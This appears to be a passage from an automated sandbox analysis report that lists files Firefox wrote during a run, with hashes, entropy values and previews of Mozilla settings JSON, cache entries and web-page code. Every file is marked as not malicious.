                                                                                                                                                                                  SSDEEP:1536:UYKrkQECPot32qKFAlHAEAOBsf51AkSAoA3ABAkWAyaUAtAm/vAIlAX5E95M2+eu:UYKrkQECAt32qKFAlHAEAOyvAkSAoA3t
                                                                                                                                                                                  MD5:7AC3A8DC6761CD86B612C4E33493A66D
                                                                                                                                                                                  SHA1:8D68B5D0C86997EBEE6A8A420B787913B071F641
                                                                                                                                                                                  SHA-256:8DF536889BF214F17D6F1C98005BA8475B6354206164D35D9C8903F8C2CFBDC4
                                                                                                                                                                                  SHA-512:2DC97D8EC6D2AE54A8C9452FA3B825F28F9702D76CE3F9AC7F05322705CD59C455AAD78643B4DC2EFB48564D976667899519E26ED07D6E2B727C8F5979B2592E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"2x2kzzhjssqa9aypmngii7pt4","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"CrXnWu7S4qZDX9x13pGXaiDDpbb9arwZBUWu0lxlepKX8U0nMDMuW9sFf-eASzOPEyLKMn4pvA34tp9qva_IkJvFxOVK5jYBqe2Og4aFEy6yTLEAaPq0N8WV3tj0c4_T","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEwsfTf5S2a2sekbOGwvfp1fzj+EX015Cbp8qoECAsPf3bIiOUBcpsPNrqE7CwENuT9M56G330NauFdbZuhlUOBbOWisNkg7ytb5xloJUDSUNPtm+vMLaNp+RQO9COPvWl"},"displayFields":["id","name"],"id":"normandy-recipes-capabilities","last_modified":1708474596345},"timestamp":1708474596141,"changes":[{"recipe":{"id":1364,"name":"HB: 2024 Win7/8 Device Migration (Win 10/11 EN-US)","action":"show-heartbeat","arguments":{"message":"Please help make Firefox better by taking this short survey","surveyId":"2024-win78-win1011cohort-enus","learnMoreUrl":"https://wiki.mozilla.org/
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19442
                                                                                                                                                                                  Entropy (8bit):6.763445506335559
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:x/mBQK9Bes3PiYH7VqN4mApqN3Xo70tNo+pwPm082nyFz/aMG:xwQFk6VApQHkKo+pwPo2Z
                                                                                                                                                                                  MD5:EBB64F05FF3DEB62336B2AA8AC00A8FC
                                                                                                                                                                                  SHA1:2A683EDE8C1FAADB17580AD28DEBCE9C99CE2D08
                                                                                                                                                                                  SHA-256:CBA20C8ECE7D9CFAC0F8B0CCA7FAB77F04F10A6AD52C03354CB1E1FED2862FDF
                                                                                                                                                                                  SHA-512:D262294617913D33624FAA1CF2F3EECF48AA8BB378B5B7CA1D9D0802D4815FC1F612C1D4080021D681A99DAD05FB3B0DC0767C3EAA596295DD9EBE164038BA57
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                  Entropy (8bit):4.961803357284853
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:yI/RRnjXDkw+qsH3X8sXWzusDvLKd+uS3jcTPVGsDZpd+ZmUmVGsD9w+IkS3jcT1:yI/rb+qmX8QuuuWxqjcT0uZpuu++DSTm
                                                                                                                                                                                  MD5:727C56C96D23D3276C3178764D81CD69
                                                                                                                                                                                  SHA1:4256D7848C4513855A343C18CAF52D52F254C130
                                                                                                                                                                                  SHA-256:51A281399E83A71D442C74C7C3CBB834073B3D31AF07CD950CCC422961963445
                                                                                                                                                                                  SHA-512:E424D3099B693DB938928ADABCA47814003789A35EE5FA06B01EE140BE436CCC5948454B5EAA2CE76549D7E2BAA840B4212BE61448718C7B5893D0EEB57B5D79
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..F~........e...e...F........../....~predictor-origin,:https://accounts.google.com/.predictor::seen.1.predictor::resource-count.3.predictor::https://www.gstatic.com/.1,8,1708515102,4096.predictor::https://fonts.gstatic.com/.1,7,1708515101,4096.predictor::https://accounts.google.com/.1,2,1708515102,4096.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8582
                                                                                                                                                                                  Entropy (8bit):6.100399502746726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:0QOBwTeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWds8ads8A:beLYGBRohB1r1uk/KiFTaIdaK0
                                                                                                                                                                                  MD5:8B4A453CFA60775FD2CDCB29350CACAA
                                                                                                                                                                                  SHA1:4B24D05C8D38E5AEDE298C84128C534F3A62FCE6
                                                                                                                                                                                  SHA-256:A851E4AD7EA10512AFB52387EF826884A30B2D885EB693112CF88139CA410326
                                                                                                                                                                                  SHA-512:A2A959F11C8496A877DB96E4EFF469074AC3CBF3A99ABC707363E323B9B6D051ABFF13CFA727F9613F8C29A9BA364951C0A203FC14AE2DB8418F3AB32ED6464B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"2wyvapgygdnqx2e95kpjamyk8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"IghkvGveEMvteLqgP9lraDwsqPPCcU-5gEEU5-pIVFKDdlxMZTFjIDPPFuaywi5dp6NwOn4boQe74koTT4o4grI5ip4Jcxct-x0fnc1Enq-GTR-okhCMpCICFXKvAXxz","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"password-rules","last_modified":1708300806966}}.3.A..........e...e...F.A.e..K...q....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/password-rules?_expected=1679600032742.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAXxMIIF7TCCA9WgA
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2584412160
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13906
                                                                                                                                                                                  Entropy (8bit):6.918155475082785
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:SW9wR4O9pU0DSjuUHLmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDx/CvDx1:SW9Erq07lzSWvoI8zSWvoIBHJmvOW
                                                                                                                                                                                  MD5:C551C0F11900FAFAD68A8B8BE6274841
                                                                                                                                                                                  SHA1:C1DF3F9A588DEE7C39B14A0A1D3BF348FE3230EA
                                                                                                                                                                                  SHA-256:787A90D586B8B983C52DAA8D48A2327359969E000CFBA2ED06F6F4E838F2DA18
                                                                                                                                                                                  SHA-512:85D1394D96026C2E6E4D2040E54A82B12EA8796F1A38352C68F2C5F04D2E4A7AEDD99B0A78A9500745A5F2F1D75300429D5C49D730F84DB6AAE15061EA0D9F83
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):58859
                                                                                                                                                                                  Entropy (8bit):5.538232498305284
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:ZTwOcg07ukcVSJd60sxe2IBqYvCKF8MOH:g7ukx60ST89rF8MOH
                                                                                                                                                                                  MD5:CD676486C8510AC6526E3F97FF9B3E93
                                                                                                                                                                                  SHA1:4DC44DF4745A760B6896F5744C3ECB5CB5AB741E
                                                                                                                                                                                  SHA-256:CB50F9760485F849402A2717B1089D8AEE7DF878447F539707E732B1141A59A0
                                                                                                                                                                                  SHA-512:AFE00CA58676BF4825EE50D7B8C6CAF46B5C3A3F3F9244CC83E258E7022225CBF14E40011B2C00BFF5A82C72F4B59F90B410FDAF8415A85F1415C2772B05D407
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"domain","schema":{"type":"object","title":"Cookie Banner Rule","required":["domain"],"properties":{"click":{"type":"object","title":"Click","properties":{"hide":{"type":"string","title":"Hide Selector","description":"Query selector for element to hide while handling cookie banner. Defaults to 'presence' selector."},"optIn":{"type":"string","title":"Opt-in Selector","description":"Query selector for opt-in / accept all button"},"optOut":{"type":"string","title":"Opt-out Selector","description":"Query selector for opt-out / reject all button"},"presence":{"type":"string","title":"Presence Selector","description":"Query selector to detect cookie banner element."}},"description":"Rules for detection of the cookie banner and simulated clicks.","dependencies":{"hide":["presence"],"optIn":["presence"],"optOut":["presence"]}},"domain":{"type":"string","title":"Domain","description":"Domain of the site the rule describes."},"cookies":{"type":"object","title":"Cookies","prop
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):113
                                                                                                                                                                                  Entropy (8bit):4.785912466814496
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:2UqOcllwXNWbdUyGLk8rLtPSKVIDIIt:2UqJlIEbdOx0KVst
                                                                                                                                                                                  MD5:F2F1528AD947D81B94718015A70A4070
                                                                                                                                                                                  SHA1:98DC00AA2C359B3E1EF62DD5DC63D365388B9A90
                                                                                                                                                                                  SHA-256:32D87A008C54F84C5154BFE3B3A0B597BA77253792749D5A60167F5FD299D23F
                                                                                                                                                                                  SHA-512:236246AA546AD3A96751429D01A004E044B8078CB3B7359742FB6A2AAC384567C3A5084E1DA277CDEA6892E28EB296E6E5AC2396FC7DF411DC381B5B9D8749E8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...x........e.......F.A........H....:https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):35420
                                                                                                                                                                                  Entropy (8bit):5.086270303730476
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:aPtFYceo3KtwnY9nR+eXHxoZ/HJkNTBdHOT5Qhh7veK8t9KZF:Aeo3KtwnY9nR+eXHcHJk/dHOTij753F
                                                                                                                                                                                  MD5:B1846D94A205AFE84DA14DED30FC1A61
                                                                                                                                                                                  SHA1:A5EFD82AD8412B4AC7435381203142DF9DF4A602
                                                                                                                                                                                  SHA-256:928B27C3C7243586603625ABC511829C330C004D87D447483C337BABA37FF715
                                                                                                                                                                                  SHA-512:4A429E99C151CF5641DC3A9F68E68C8814109673EC2AE6DC71097A6FA86681FAA6FB0E9A6C3A0532553C3DFEDE8D26B1FADEEF8C2FCAFE653D31FF241DA28907
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<!doctype html>.<html>. <head>. <meta charset="utf-8">. <meta http-equiv="Content-Security-Policy" content="default-src 'none'; object-src 'none'; script-src resource: chrome:; connect-src https:; img-src https: data: blob: chrome:; style-src 'unsafe-inline';">. <meta name="color-scheme" content="light dark">. <title data-l10n-id="newtab-page-title"></title>. <link rel="icon" type="image/png" href="chrome://branding/content/icon32.png"/>. <link rel="localization" href="branding/brand.ftl" />. <link rel="localization" href="toolkit/branding/brandings.ftl" />. <link rel="localization" href="browser/newtab/newtab.ftl" />. <link rel="stylesheet" href="chrome://browser/content/contentSearchUI.css" />. <link rel="stylesheet" href="chrome://activity-stream/content/css/activity-stream.css" />. </head>. Cached: Wed, 21 Feb 2024 11:30:40 GMT -->. <body class="activity-stream">. <div id="header-asrouter-container" role="presentation"></div>. <div id="r
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):79400
                                                                                                                                                                                  Entropy (8bit):5.397078964112072
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:WwNUVzjw3BMZSJehg8EsLDkMnCszSYRK6vcm9e8GvIDuuKOa8S:3UVzjw3BMZSt8VcMn7VTvLavCKF8S
                                                                                                                                                                                  MD5:962420CA5B6131FC6D43CF44335299FC
                                                                                                                                                                                  SHA1:3862E684BFBECFD33BDEF7E899D91CDF2D655774
                                                                                                                                                                                  SHA-256:F47351EA1EF3003B81396CA47E5F26FC20A2508700BA1A6F8E55135D52E82BD2
                                                                                                                                                                                  SHA-512:D4B8EE0AD2C214CAD2859746B4CE802234F2AF97C57077C24B8C2580C369FE13338826A89AEFD05647EFC2BB692142B8721992362009CBB39A6E7DD1BA8FDC28
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["name","version","fromLang","toLang","fileType"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the language model"},"toLang":{"type":"string","title":"To Language","description":"The BCP 47 language tag that will be translated to"},"version":{"type":"number","title":"Version","description":"The version of the model"},"fileType":{"enum":["model","lex","vocab","qualityModel","srcvocab","trgvocab"]},"fromLang":{"type":"string","title":"From Language","description":"The BCP 47 language tag that will be translated from"}}},"signature":{"ref":"6l2fz9kn1itzn2jt8iu1ix6x","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-04-09-14-36-39.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"jjbe2SbJ3p5ZHnh0ZiYZBMuywBKzBDoUpRG3DWgM_wUltcC5nJIm_z2a_geEu-LDTQsgtb_F3Mr1VHZ0t0s_l9UnHlPZMOkLXXHapPnoAG
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16707
                                                                                                                                                                                  Entropy (8bit):6.278045458727721
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:eX/7VqN4mApqN3Xo70tNo+pwPm082nyFz/aWXW6:eXUApQHkKo+pwPo2am6
                                                                                                                                                                                  MD5:14DE29C0D0B4BAC29892632179753D19
                                                                                                                                                                                  SHA1:680208D6F712CBC7250BB31D2A7D582B68DFB038
                                                                                                                                                                                  SHA-256:3E6B90A95482C5EB3994EF1718AF8E8BCDB91CE3A78EDC50985ACCC9A18F30DF
                                                                                                                                                                                  SHA-512:1CC234AA04EDDA0EB5DDA0303C457901F279C39D42DF824A3FC968696F7AA45DF530512794430822035BFD27D0C4EA92876E8A1E97B2D2B40FFDB2FABEE46B75
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2550857728
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13904
                                                                                                                                                                                  Entropy (8bit):6.922946455653749
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:ve8Lst01cSjuUPLmzwTWvoglJmzwTWvogrBHJm2OdAnAyCvDxTCvDxb:3stYYFzSWvoI8zSWvoIBHJmvOR
                                                                                                                                                                                  MD5:65062093D38BE29E2F16CE765B9EEB6B
                                                                                                                                                                                  SHA1:181955F9EB77042A0610E8BE0B432EECC18CD56D
                                                                                                                                                                                  SHA-256:2AEB0850EF2D8B01BA680EF1C8A08C758BE8536822CF7623755927375F81890E
                                                                                                                                                                                  SHA-512:7B30934E6CFF6FACDEDF24ED1595E6FF117B2B5D9AB70643262B9EDF91A98DDEE46213F51A73054EF46C1374C8D889493134A1F7DA869583476C61D3B6A1A0F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PNG image data, 150 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11018
                                                                                                                                                                                  Entropy (8bit):7.102383988586553
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:c2/XQnPGroGD9vvnXVaKrJ4XbfAzUUV+S0t7MVkyfXfbaI8j3qm1r7o1r7C:p/XQneroUYKrkb4XV+S0mVkEXTaId8
                                                                                                                                                                                  MD5:41A77BB25D6781AD195A5C20F1085C41
                                                                                                                                                                                  SHA1:CDD595866173A7786A5EC0356BD01AFF78D7856A
                                                                                                                                                                                  SHA-256:9968472D0B84377D1991F9E89F8589181490CD5ED8BA470B9E5AA95FD14E6945
                                                                                                                                                                                  SHA-512:19ECC60CBE05BCD4FAB456B695B16848FAFB1B353C04CA48BFA7879A343055DBA5E1CD9ABF4C794A659CEED41898EA334BD9CC1E1A63BF901C36272512FC0A60
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (4919)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):782603
                                                                                                                                                                                  Entropy (8bit):5.590013085727958
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:Jme85Yf5fEt77xSzVJXd44E8W6t7pI7hLPGMZQ+jVkta9HAMBelqm5D6J8r:iZSzV4e7WjVktnwpqr
                                                                                                                                                                                  MD5:31D8F88DA7FB7FFF8B870CB8D303C0CE
                                                                                                                                                                                  SHA1:D42D586954C7E4BE90BC79AE361F0F200B26B1F6
                                                                                                                                                                                  SHA-256:8717EB25DD5BAD978F431EE3A0F89E37A4D0B4ED10BCD86FDB8FE2A23EBB167D
                                                                                                                                                                                  SHA-512:C75B9294F7F2F6D35AD830EE31FEFD63C3B75324479AB83FCFBE01844A717CF979193F9B0BA80111B0C7505A77CC2C7246D2AB5E74E68672E5E86F8F64B1A2CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometLogInHiddenInputs_data.graphql",[],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"value",storageKey:null}];return{argumentDefinitions:[],kind:"Fragment",metadata:null,name:"CometLogInHiddenInputs_data",selections:[{alias:null,args:null,kind:"ScalarField",name:"prefill_contactpoint",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"prefill_source",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"idd_user_crypted_uid",storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"locale",storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"lsd",plural:!1,selections:a,storageKey:null},{alias:null,args:null,concreteType:"LoginNameValue",kind:"LinkedField",name:"jazoest",plural:!1,selections:a,storageKey:null},{alias:null,args:null,kind:"ScalarField",name:"login_source
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):14644
                                                                                                                                                                                  Entropy (8bit):5.90724431559405
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:y7VqN4mApqN3Xo70tNo+pwPm082nyFz/Q:vApQHkKo+pwPo2D
                                                                                                                                                                                  MD5:0432594F7DDC4CD2003C6358F819F2BE
                                                                                                                                                                                  SHA1:150E682C3338A1CA2102A31EB9B895632409A8BC
                                                                                                                                                                                  SHA-256:E7C7F66B0506832F90B079108CEBB6C959D167F7732B83273C2865CE6815EC1B
                                                                                                                                                                                  SHA-512:302A9538DB34A4EEF02BA3C473D09FB80887FD5DD07302C135C0A0C6476B4964E011D71BA7087714A616F119E6ED9D2B281FC8821B60F5151887995937350D41
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:^.C ........e...e...F.A.e......X....O^partitionKey=%28https%2Cgoogle.com%29,:https://accounts.google.com/generate_204?T9-P6A.necko:classified.1.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8716
                                                                                                                                                                                  Entropy (8bit):6.107944858928577
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:vBgeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWd25Ld25L:ieLYGBRohB1r1uk/KiFTaIdaem
                                                                                                                                                                                  MD5:67BA54E102BECDF745A40A56C8BF1BEB
                                                                                                                                                                                  SHA1:33A73F39422F953ADBF764F0BC0D4E586BF631F3
                                                                                                                                                                                  SHA-256:03437F557C0A021B6DDF6BD5AF8E58C573B0503BDF7F064B4E9A55BAEE8F8C7E
                                                                                                                                                                                  SHA-512:4CA3BB0B25A1AEDD0D5C70810B08292AFB7D7BED8969F2476915812CE7059FD8EE71273C3CB6F91CA72D61EAFF8F4384D83F7AF63E6C3849869B3E26F5CED018
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"17rulcxfyfmye2typue5j0afwb","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"jvmCnaV-W5c0Ffu4qd7mmb0sfSdZnBJQpcd7oBEKQODSbQ3jJ_ttzwzPvvCvUSdD8-2CQb5Z8v2KADBLNw184G2726eiq6ljNVRl5LZTkDCDht7hU47hJr1eNkJk_-Dg","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"attachment":{"enabled":false,"required":false},"displayFields":["thirdPartyId","overridesId"],"id":"search-default-override-allowlist","last_modified":1708041621125}}C..@..........e...e...F.A.e...........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-default-override-allowlist?_expected=1595254618540.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAA
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 1208352768
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12577
                                                                                                                                                                                  Entropy (8bit):6.66216794116053
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:PUYRM87tSjzUcQmzwTWvoglJmzwTWvogrBHJm2OdAnAlCvDxlCvDxT:PUYRh7qbzSWvoI8zSWvoIBHJmvO+
                                                                                                                                                                                  MD5:73AE4E3B28A6EEAE16F0DBDC636939D9
                                                                                                                                                                                  SHA1:94B2DD84A04459E058F76C40E3845C43BAEC478B
                                                                                                                                                                                  SHA-256:0D6018AB0A9CCF609F0E466C694B73EF49340E7EBF04B3934DAE776A4CF14963
                                                                                                                                                                                  SHA-512:836F603C9368B2DB31722A30438E4C6140D6E74129DBD072968133BCC04CA39E8F4090CC6CE08D37F88BD76D1D1860A60967A4F5BFD955FC19E5312938F3AF33
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12983
                                                                                                                                                                                  Entropy (8bit):6.040529360108778
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:H3vPu9fiGLm4pUOE0M6dtE0M6dwtL2m2B:OBi8mCUOE56dtE56dwcv
                                                                                                                                                                                  MD5:83B93C6C3C7172D0C3C7F2AE1FA0C337
                                                                                                                                                                                  SHA1:CE39D0A6D78AB71762F575110F2DB8215A5C4964
                                                                                                                                                                                  SHA-256:535E00667B73BE8CBF29346C538CC15E46D94E72B899450525550B061B18B5C8
                                                                                                                                                                                  SHA-512:0D9226A64180A1AC62E63D6C1EA854BD868C3247D2B701D90FE1CDF49F07A82BD7EBDAD48AED1AED88DA1D16B32D1380889F54CFB553D6E5678BA7D5DF34C757
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2167799808
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):24355
                                                                                                                                                                                  Entropy (8bit):7.6692750790083295
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:vzpnJCvsIdXvoDX4LZoqltz2oP1fCy+5n07MrnHmzwTWvoglJmzwTWvogrBHJm2D:XidXg74VRz2QgJnfCzSWvoI8zSWvoIBr
                                                                                                                                                                                  MD5:D5D81B5286BF394CCFCFEF40AD8707A2
                                                                                                                                                                                  SHA1:BDBE29FDA500FDA11CACD44B06BF8CDAF6A2A3AE
                                                                                                                                                                                  SHA-256:E55ACB4777C3F69BFD6B715A3514D826A0C2F98A6C86121FAC3B20F6854F8BD6
                                                                                                                                                                                  SHA-512:7F98FC8B515DFF9F8A326A356401484757A619B710E788EA3F3C3B177E94D25F98F625615B4BB1C15CD6526996AD1A8F34464817CB21C2C0EDCDC8B41884A40F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12054
                                                                                                                                                                                  Entropy (8bit):6.021649892576228
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:YKCJy5JIJ6stInknB9JssJ9ZJ9eJHlJ9OJy9aeyheEVGq8BRwtkQpSISkrJAy/Gq:YKCe6IRcj5+TuaaeLYGBRohB1r1uk/KS
                                                                                                                                                                                  MD5:596E1D9066811E9E0EAB7C90B59A3013
                                                                                                                                                                                  SHA1:6E9BEB0B356190BC80D26210C3FD6C4497B62E2B
                                                                                                                                                                                  SHA-256:FA75542B1389AC24D2A39E75D7553126A2195575ABB85FF2AA6C5676923F02E8
                                                                                                                                                                                  SHA-512:B6AE60C5A9EAF019ED0F0EE52F2A3495439F9304BEAA3A03CDFBF39911D128FEC457EF088B841DBF6A599F3A7C05DD3E9314E10596D596EBE0229EA154389BFF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"$id":"http://example.com/example.json","type":"object","title":"The root schema","$schema":"http://json-schema.org/draft-07/schema","default":{},"examples":[{"id":"US","providers":"cloudflare-global, nextdns-global","rolloutEnabled":true,"steeringEnabled":true,"steeringProviders":"comcast-US","autoDefaultEnabled":false,"autoDefaultProviders":""}],"required":["id","rolloutEnabled","steeringEnabled","autoDefaultEnabled"],"properties":{"id":{"$id":"#/properties/id","type":"string","title":"Region ID","default":"","examples":["US"],"description":"An identifier for the region compatible with Region.jsm"},"providers":{"$id":"#/properties/providers","type":"string","title":"Regional providers","default":"","examples":["foo, bar"],"description":"Comma-separated list of provider identifiers, referencing doh-providers collection"},"rolloutEnabled":{"$id":"#/properties/rolloutEnabled","type":"boolean","title":"Enable rollout in this region","default
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040764171584436
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:8MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckNLUcuNLU3:rWebV2GZuZrFK0k0t7qW0NbZovEpau
                                                                                                                                                                                  MD5:C29B5CDA41D878A9AA19077EC4B54864
                                                                                                                                                                                  SHA1:46A47778DBB47547C39BC03219DDC4D7B3ED301A
                                                                                                                                                                                  SHA-256:503C49101F2139B1A1E061FC013E041F44DD74CE275EBF60F38A3FAD7216CCFB
                                                                                                                                                                                  SHA-512:DA4BE11DAAF3653903FDB63728EB3C4730161B7B3D0EB6BA7E16E69F85FD843C6F8BC753BA9A97FC0E0ADD995800D9D17ECE1111F6E9A1B757EB7EE398FF046D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.@.0........e...e...F.A.e......z....a,~1708514996,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/newtab/1/8940dc38-b85f-4355-b090-8e4e300a9627.strongly-framed.1.security-info.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
